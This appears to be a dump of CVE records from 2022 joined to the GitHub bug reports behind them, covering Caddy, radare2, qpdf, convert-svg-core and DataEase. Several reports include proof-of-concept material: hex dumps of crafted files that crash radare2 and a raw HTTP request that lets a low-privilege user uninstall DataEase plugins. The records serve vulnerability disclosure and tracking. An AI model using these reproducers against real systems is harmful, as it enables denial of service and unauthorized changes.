https://github.com/caddyserver/caddy/issues/4775#issuecomment-1203388116
null
github.com
[ "caddyserver", "caddy" ]
It occurs in modules/caddyhttp/rewrite/rewrite.go. Specifically,this bug locates in `func (rewr Rewrite) rewrite` ```go func (rewr Rewrite) rewrite(r *http.Request, repl *caddy.Replacer, logger *zap.Logger) bool { oldMethod := r.Method oldURI := r.RequestURI // method if rewr.Method != "" { r.Method = strings.ToUpper(repl.ReplaceAll(rewr.Method, "")) } // uri (path, query string and... fragment, because why not) if uri := rewr.URI; uri != "" { // find the bounds of each part of the URI that exist pathStart, qsStart, fragStart := -1, -1, -1 pathEnd, qsEnd := -1, -1 for i, ch := range uri { switch { case ch == '?' && qsStart < 0: pathEnd, qsStart = i, i+1 case ch == '#' && fragStart < 0: qsEnd, fragStart = i, i+1 case pathStart < 0 && qsStart < 0 && fragStart < 0: pathStart = i } } if pathStart >= 0 && pathEnd < 0 { pathEnd = len(uri) } if qsStart >= 0 && qsEnd < 0 { qsEnd = len(uri) } // isolate the three main components of the URI var path, query, frag string if pathStart > -1 { path = uri[pathStart:pathEnd] } if qsStart > -1 { query = uri[qsStart:qsEnd] } if fragStart > -1 { frag = uri[fragStart:] } ... ``` In this function, it parse the `rewr.URI` and attemps to find the bounds of each part of the URI that exist. However, this implementation is too simple to handle unexpected scenarios. If '#' appears in front of the '?' in `rewr.URI`, it makes that `qsStart` is larger than `qsEnd`, which leads to a crash like _'panic: runtime error: slice bounds out of range'_ in slice accessing at `query = uri[qsStart:qsEnd]`
[panic]: slice OOB caused by illegal uri
https://api.github.com/repos/caddyserver/caddy/issues/4775/comments
8
2022-05-09T06:30:02Z
2022-08-03T05:25:39Z
https://github.com/caddyserver/caddy/issues/4775
1,229,239,444
4,775
3,865
CVE-2022-34502
2022-07-22T15:15:08.703
Radare2 v5.7.0 was discovered to contain a heap buffer overflow via the function consume_encoded_name_new at format/wasm/wasm.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted binary file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "C3D7A38B-5772-4F2B-AF10-7C79AF2F18FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/radareorg/radare2/issues/20336
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ```sh Mon Jun 20 03:01:00 PM CST 2022 radare2 5.7.0 28296 @ linux-x86-64 git.5.7.0 commit: 09569c1d5c324df7f23bdc9ad864ac1c25925745 build: 2022-06-20__11:48:07 Linux x86_64 ``` ## Description After 5.7.0 release, a heap buffer overflow can be found in function `consume_encoded_name_new` in `format/wasm/wasm.c` via openning a crafted binary file with r2. <!-- Explain what's the issue and what would you expect to see --> ## Test 1. Build Radare2 with AddressSanitizer enabled. (Just execute `./sys/sanitize.sh`) 2. Make a PoC file with size of just 38 bytes. Save the content below as `hex.txt` ``` 00000000: 0061 736d 7f00 0000 0001 0dff 7436 ff8b .asm........t6.. 00000010: 3000 3e01 499f 1000 fc00 7f45 4c46 80ff 0.>.I......ELF.. 00000020: fe61 73ff 0240 .as..@ ``` `xxd -r hex.txt > PoCfile` to create the poc file 3. `r2 PoCfile` ```log ==1862034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000156b8 at pc 0x7fd01225622c bp 0x7ffc007f6a20 sp 0x7ffc007f6a10 WRITE of size 1 at 0x6060000156b8 thread T0 #0 0x7fd01225622b in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:147 #1 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955 #2 0x7fd01225b053 in r_bin_wasm_init /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:872 #3 0x7fd0122501e2 in load_buffer /home/ubuntu/radare2/libr/..//libr/bin/p/bin_wasm.c:29 #4 0x7fd011e1352c in r_bin_object_new /home/ubuntu/radare2/libr/bin/bobj.c:149 #5 0x7fd011e08513 in r_bin_file_new_from_buffer /home/ubuntu/radare2/libr/bin/bfile.c:592 #6 0x7fd011dc5baa in r_bin_open_buf /home/ubuntu/radare2/libr/bin/bin.c:285 #7 0x7fd011dc6996 in r_bin_open_io /home/ubuntu/radare2/libr/bin/bin.c:345 #8 0x7fd0142a6b57 in r_core_file_do_load_for_io_plugin /home/ubuntu/radare2/libr/core/cfile.c:436 #9 0x7fd0142a96fb in r_core_bin_load /home/ubuntu/radare2/libr/core/cfile.c:637 #10 0x7fd019bb1d8f in r_main_radare2 /home/ubuntu/radare2/libr/main/radare2.c:1256 #11 0x5557ff52696e in main /home/ubuntu/radare2/binr/radare2/radare2.c:104 #12 0x7fd018faf082 in __libc_start_main ../csu/libc-start.c:308 #13 0x5557ff52630d in _start (/home/ubuntu/radare2/binr/radare2/radare2+0x230d) 0x6060000156b8 is located 2 bytes to the right of 54-byte region [0x606000015680,0x6060000156b6) allocated by thread T0 here: #0 0x7fd01ad24808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fd0122552f4 in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:133 #2 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955 ``` <!-- Steps to reproduce the issue and provide files/links/images/.. --> The vulnerable code is introduced in https://github.com/radareorg/radare2/commit/b0129d72075cc148f8d91a7d17dd76314e91d91a#diff-4d372afc1ec76c51b9f2f402ae1b543c699030475eb192b8d49ec8dd47f04b0cR132-R147
heap-buffer-overflow in WASM name handling after 5.7.0 release
https://api.github.com/repos/radareorg/radare2/issues/20336/comments
2
2022-06-20T07:52:24Z
2023-02-10T00:34:07Z
https://github.com/radareorg/radare2/issues/20336
1,276,517,429
20,336
3,866
CVE-2022-34503
2022-07-22T15:15:08.743
QPDF v8.4.2 was discovered to contain a heap buffer overflow via the function QPDF::processXRefStream. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/qpdf/qpdf/issues/701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/qpdf/qpdf/issues/701" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:qpdf_project:qpdf:8.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "B51E3AFF-75A5-4484-BCBD-57E06F707375", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/qpdf/qpdf/issues/701
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "qpdf", "qpdf" ]
Hi, I have found a heap-buffer-overflow in QPDF 8.4.2 using ASAN, which has not been reported yet. But after https://github.com/qpdf/qpdf/commit/d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e, the heap-buffer-overflow seems to disappear. I don't know exactly how the commit mitigate the problem since it was intended to fix sign and conversion warnings. To reproduce, compile QPDF with address sanitizer ```sh export CC=clang export CXX=clang++ export CFLAGS="-g -fsanitize=address" export CPPFLAGS="-g -fsanitize=address" export LDFLAGS="-fsanitize=address" ``` Download the testcase [HeapBOF-processXRefStream.zip](https://github.com/qpdf/qpdf/files/8674322/HeapBOF-processXRefStream.zip) `qpdf ./HeapBOF-processXRefStream -` Then after some warnings, ASAN should complain about heap-buffer-overflow. ``` ❯ ./install/bin/qpdf ./HeapBOF-processXRefStream - WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): unknown token while reading object; treating as string WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 189): invalid character (i) in hexstring WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 201): unknown token while reading object; treating as string WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 235): unexpected > WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 269): unknown token while reading object; treating as string WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 273): unknown token while reading object; treating as string WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 302): unknown token while reading object; treating as string WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 320): unexpected ) WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 380): treating unexpected array close token as null WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake1 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake2 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake3 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake4 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake5 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake6 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake7 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 127): expected dictionary key but found non-name object; inserting key /QPDFFake8 WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 124): /Length key in stream dictionary is not an integer WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 391): attempting to recover stream length WARNING: ./HeapBOF-processXRefStream (xref stream: object 24 0, offset 391): recovered stream length: 31 WARNING: ./HeapBOF-processXRefStream (xref stream, offset 116): Cross-reference stream data has the wrong size; expected = 35; actual = 38 ================================================================= ==2770728==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000008936 at pc 0x561e09240f1c bp 0x7ffc29847050 sp 0x7ffc29847048 READ of size 1 at 0x604000008936 thread T0 #0 0x561e09240f1b in QPDF::processXRefStream(long long, QPDFObjectHandle&) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:1132:33 #1 0x561e092362f4 in QPDF::read_xrefStream(long long) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:970:20 #2 0x561e0922415a in QPDF::read_xref(long long) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:598:20 #3 0x561e09220faf in QPDF::parse(char const*) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:403:2 #4 0x561e0921f54a in QPDF::processFile(char const*, char const*) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:204:5 #5 0x561e091d759f in PointerHolder<QPDF> do_process_once<char const*>(void (QPDF::*)(char const*, char const*), char const*, char const*, Options&, bool) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4005:9 #6 0x561e091c69cd in PointerHolder<QPDF> do_process<char const*>(void (QPDF::*)(char const*, char const*), char const*, char const*, Options&, bool) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4043:16 #7 0x561e091c69cd in process_file(char const*, char const*, Options&) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4105:12 #8 0x561e091bd6de in realmain(int, char**) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:5062:13 #9 0x561e091d73f8 in main qpdf/qpdf-8.4.2/qpdf/qpdf.cc:5143:12 #10 0x7f9220def30f in __libc_start_call_main libc-start.c #11 0x7f9220def3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0) #12 0x561e0908ce84 in _start (qpdf/qpdf-8.4.2/install/bin/qpdf+0x72e84) 0x604000008936 is located 0 bytes to the right of 38-byte region [0x604000008910,0x604000008936) allocated by thread T0 here: #0 0x561e09171491 in operator new[](unsigned long) (qpdf/qpdf-8.4.2/install/bin/qpdf+0x157491) #1 0x561e09415c90 in Buffer::init(unsigned long, unsigned char*, bool) qpdf/qpdf-8.4.2/libqpdf/Buffer.cc:45:22 #2 0x561e09415c90 in Buffer::Buffer(unsigned long) qpdf/qpdf-8.4.2/libqpdf/Buffer.cc:12:5 #3 0x561e094201bf in Pl_Buffer::getBuffer() qpdf/qpdf-8.4.2/libqpdf/Pl_Buffer.cc:72:21 #4 0x561e09378e16 in QPDF_Stream::getStreamData(qpdf_stream_decode_level_e) qpdf/qpdf-8.4.2/libqpdf/QPDF_Stream.cc:171:16 #5 0x561e092b4495 in QPDFObjectHandle::getStreamData(qpdf_stream_decode_level_e) qpdf/qpdf-8.4.2/libqpdf/QPDFObjectHandle.cc:1041:31 #6 0x561e0923e592 in QPDF::processXRefStream(long long, QPDFObjectHandle&) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:1086:41 #7 0x561e092362f4 in QPDF::read_xrefStream(long long) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:970:20 #8 0x561e0922415a in QPDF::read_xref(long long) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:598:20 #9 0x561e09220faf in QPDF::parse(char const*) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:403:2 #10 0x561e0921f54a in QPDF::processFile(char const*, char const*) qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:204:5 #11 0x561e091d759f in PointerHolder<QPDF> do_process_once<char const*>(void (QPDF::*)(char const*, char const*), char const*, char const*, Options&, bool) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4005:9 #12 0x561e091c69cd in PointerHolder<QPDF> do_process<char const*>(void (QPDF::*)(char const*, char const*), char const*, char const*, Options&, bool) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4043:16 #13 0x561e091c69cd in process_file(char const*, char const*, Options&) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:4105:12 #14 0x561e091bd6de in realmain(int, char**) qpdf/qpdf-8.4.2/qpdf/qpdf.cc:5062:13 #15 0x561e091d73f8 in main qpdf/qpdf-8.4.2/qpdf/qpdf.cc:5143:12 #16 0x7f9220def30f in __libc_start_call_main libc-start.c SUMMARY: AddressSanitizer: heap-buffer-overflow qpdf/qpdf-8.4.2/libqpdf/QPDF.cc:1132:33 in QPDF::processXRefStream(long long, QPDFObjectHandle&) Shadow bytes around the buggy address: 0x0c087fff90d0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff90e0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff90f0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff9100: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff9110: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa =>0x0c087fff9120: fa fa 00 00 00 00[06]fa fa fa fa fa fa fa fa fa 0x0c087fff9130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==2770728==ABORTING ``` I find https://github.com/qpdf/qpdf/blob/release-qpdf-8.4.2/libqpdf/QPDF.cc#L1111-L1134 responsible for this heap-buffer-overflow. After reading and debugging this code, I try to explain the reason as below. `data` points to a piece of previously allocated buf with size of 38, which equals to `actual_size`. `expected_size` = `entry_size` * `num_entries` = 5 * 7 = 35, and the expected_size < actual_size is just warn and will not throw an exception. In each time of the first loop, `entry += entry_size`, then `p = entry`. The second loop iterates j in range(0,3), the innermost loop and then increase W[j] to p, the final overflow exceeds the size of 38, triggering heap-buffer-overflow.
heap-buffer-overflow in `QPDF::processXRefStream` found by ASAN
https://api.github.com/repos/qpdf/qpdf/issues/701/comments
6
2022-05-12T01:40:43Z
2022-07-27T17:57:04Z
https://github.com/qpdf/qpdf/issues/701
1,233,342,875
701
3,867
CVE-2022-34520
2022-07-22T15:15:08.827
Radare2 v5.7.2 was discovered to contain a NULL pointer dereference via the function r_bin_file_xtr_load_buffer at bin/bfile.c. This vulnerability allows attackers to cause a Denial of Service (DOS) via a crafted binary file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20354" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20354" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:5.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "6E68F1D1-553D-479A-8773-ABCECDD7F1BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/radareorg/radare2/issues/20354
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ```sh Sat Jun 25 11:13:09 AM CST 2022 radare2 5.7.3 28346 @ linux-x86-64 git.5.6.6-689-gf369ff2de commit: f369ff2de3c807681ec76df450ee6d4af5e04ce0 build: 2022-06-24__10:39:32 ``` ## Description NULL pointer dereference in function `r_bin_file_xtr_load_buffer` in `bin/bfile.c` in Radare2 5.7.2 could crash the application when opening a crafted binary file with r2. Typically, attackers can leverage this vulnerability to perform denial-of-service attack in the context of the current user. ## Test 1. Build Radare2 normally or with `UBSAN` enabled 2. Make a PoC file with size of just 32 bytes. Save the content below as `hex.txt` ``` 00000000: 5841 4c5a 0000 0010 009a 454c 4680 009a XALZ......ELF... 00000010: 454c 4280 df96 0003 df7b 0003 ff5b 003e ELB......{...[.> ``` `xxd -r hex.txt > PoCfile` to create the poc file 3. `r2 PoCfile`, the program will crash immediately When built normally: ``` ERROR: LZ4 decompression failed zsh: segmentation fault (core dumped) ./install0/bin/r2 PoCfile ``` When `UBSAN` and `ASAN` enabled: ``` ERROR: LZ4 decompression failed ../libr/bin/bfile.c:817:7: runtime error: member access within null pointer of type 'RBinXtrData' (aka 'struct r_bin_xtr_data_t') SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../libr/bin/bfile.c:817:7 in AddressSanitizer:DEADLYSIGNAL ================================================================= ==3515943==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x56147ed500b0 bp 0x7ffe95e3a3a0 sp 0x7ffe95e3a0a0 T0) ==3515943==The signal is caused by a WRITE memory access. ==3515943==Hint: address points to the zero page. #0 0x56147ed500b0 in r_bin_file_xtr_load_buffer /data/Repo/radare2/build/../libr/bin/bfile.c:817:13 #1 0x56147ec16be6 in r_bin_open_buf /data/Repo/radare2/build/../libr/bin/bin.c:275:11 #2 0x56147ec1157d in r_bin_open_io /data/Repo/radare2/build/../libr/bin/bin.c:345:13 #3 0x56147c1b6a99 in r_core_file_do_load_for_io_plugin /data/Repo/radare2/build/../libr/core/cfile.c:436:7 #4 0x56147c195842 in r_core_bin_load /data/Repo/radare2/build/../libr/core/cfile.c:637:4 #5 0x561477ea9ef1 in r_main_radare2 /data/Repo/radare2/build/../libr/main/radare2.c:1258:15 ```
NULL pointer dereference in `r_bin_file_xtr_load_buffer`
https://api.github.com/repos/radareorg/radare2/issues/20354/comments
1
2022-06-25T03:31:59Z
2022-06-25T15:08:52Z
https://github.com/radareorg/radare2/issues/20354
1,284,427,588
20,354
3,868
CVE-2022-25759
2022-07-22T20:15:09.187
The package convert-svg-core before 0.6.2 are vulnerable to Remote Code Injection via sending an SVG file containing the payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/commit/7e6031ac7427cf82cf312cb4a25040f2e6efe7a5" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/issues/81" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/pull/82" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-2849633" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/commit/7e6031ac7427cf82cf312cb4a25040f2e6efe7a5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/issues/81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/neocotic/convert-svg/pull/82" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-2849633" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:convert-svg-core_project:convert-svg-core:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "8DD21343-DE31-4E60-A591-F972FFEB4C2A", "versionEndExcluding": "0.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/neocotic/convert-svg/issues/81
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "neocotic", "convert-svg" ]
Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file. <img width="1231" alt="poc" src="https://user-images.githubusercontent.com/18032641/170427057-c7dd1eaa-0981-4cb5-bca6-48a68bf05719.png">
Remote Code Injection vulnerable
https://api.github.com/repos/neocotic/convert-svg/issues/81/comments
11
2022-05-26T06:05:04Z
2022-05-29T16:19:21Z
https://github.com/neocotic/convert-svg/issues/81
1,249,139,609
81
3,869
CVE-2022-34112
2022-07-22T23:15:08.053
An access control issue in the component /api/plugin/uninstall Dataease v1.11.1 allows attackers to arbitrarily uninstall the plugin, a right normally reserved for the administrator.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2429" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2429" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dataease_project:dataease:1.11.1:*:*:*:*:*:*:*", "matchCriteriaId": "24D016E4-391C-45A7-B7F1-32ADEECD319D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/dataease/dataease/issues/2429
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dataease", "dataease" ]
**DataEase 版本** 最新版 **运行方式(安装包运行 or 源码运行 ?)** 安装包运行 **浏览器版本** 任意 **Bug 描述** 普通权限越权卸载插件 **Bug 重现步骤(有截图更好)** 普通用户无法对插件进行处理,但是通过调用接口可对插件进行卸载: ``` POST /api/plugin/uninstall/1 HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Authorization: xxx LINK-PWD-TOKEN: null Connection: close Content-Length: 0 ``` Authorization为鉴权标准,低权限依然可以调用api/plugin/uninstall接口进行插件卸载: <img width="963" alt="image" src="https://user-images.githubusercontent.com/76553352/173774203-0327bb05-9054-45c6-9680-4574ee824b4e.png"> 包发送后显示成功: <img width="970" alt="image" src="https://user-images.githubusercontent.com/76553352/173774267-1c20b3d9-1016-4148-9416-16ca7c454ff9.png"> 管理员查看插件被卸载,漏洞利用成功: <img width="973" alt="image" src="https://user-images.githubusercontent.com/76553352/173774377-662966a1-8747-44f1-82fa-03cf34092ce0.png">
[Bug]普通权限越权卸载插件
https://api.github.com/repos/dataease/dataease/issues/2429/comments
2
2022-06-15T07:59:25Z
2022-06-17T10:34:21Z
https://github.com/dataease/dataease/issues/2429
1,271,826,696
2,429
3,870
CVE-2022-34114
2022-07-22T23:15:08.143
Dataease v1.11.1 was discovered to contain a SQL injection vulnerability via the parameter dataSourceId.
